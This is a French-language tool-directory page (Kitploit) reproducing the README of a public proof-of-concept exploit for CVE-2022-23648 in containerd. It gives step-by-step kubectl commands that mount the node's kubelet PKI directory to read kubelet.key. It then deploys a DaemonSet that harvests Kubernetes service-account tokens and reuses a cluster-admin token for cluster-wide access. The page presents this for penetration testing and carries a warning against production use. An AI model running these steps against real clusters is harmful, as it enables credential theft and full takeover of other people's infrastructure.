Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-23648-POC — POC pour CVE-2022-23648 | Kitploit
Outils/GitHubGitHub/raesene/cve-2022-23648-poc
Escalade de PrivilègesSécurité des ConteneursAnalyse des VulnérabilitésExploitationTests d'IntrusionSécurité Cloud
GitHubraesene/cve-2022-23648-poc

CVE-2022-23648-POC

POC pour CVE-2022-23648

Voir le dépôt
36101il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept pour CVE-2022-23648

Ceci est une preuve de concept pour le CVE-2022-23648 de @_fel1x. Informations de divulgation ici, informations sur le CVE ici et un blog avec plus d'informations et des idées de mitigation ici. Le Containerfile contient les informations nécessaires, et vous pouvez changer la cible du VOLUME pour essayer différents chemins.

Le moyen le plus simple de montrer son fonctionnement est d'utiliser KinD qui a des images exploitables.

Procédure de test de base

À moins que le nœud n'ait beaucoup de données dans /var/lib/kubelet/pki, cela devrait être un test sûr.

  • kind create cluster --image=kindest/node:v1.21.1
  • kubectl create -f pod-manifest.yaml
  • kubectl exec poctest -- ls /var/lib/kubelet/pki/

Et si vous obtenez des fichiers incluant kubelet.key, cela a fonctionné :)

Tentative d'escalade vers cluster-admin

REMARQUE : N'essayez pas cela sur un cluster de production. Un Containerd vulnérable pourrait dupliquer beaucoup de données dans ce pod d'attaque et épuiser l'espace disque. De plus, cela imprimera les jetons SA cluster-admin dans les logs du pod, qui sont susceptibles d'être envoyés en texte clair vers une destination de journalisation.

Cela exécutera un DaemonSet qui tente d'énumérer tous les jetons de compte de service Kubernetes sur le nœud et de les imprimer dans les logs du pod s'il s'avère être un jeton cluster-admin.

  • kubectl apply -f ds.yaml
  • kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i '*' '*' -A

Si yes est imprimé, félicitations, vous avez un jeton de compte de service cluster-admin de courte durée, exécutez :

  • kubectl logs -l app=poctest | head -1 | awk -F\. '{print $2}' | base64 -d pour voir quel SA c'est

  • kubectl --token="$(kubectl logs -l app=poctest | head -1)" get pods -A

  • kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i --list

Auteur

  • Rory McCune @raesene

Contributeurs

  • @BradGeesaman - DaemonSet d'escalade
Télécharger l’outil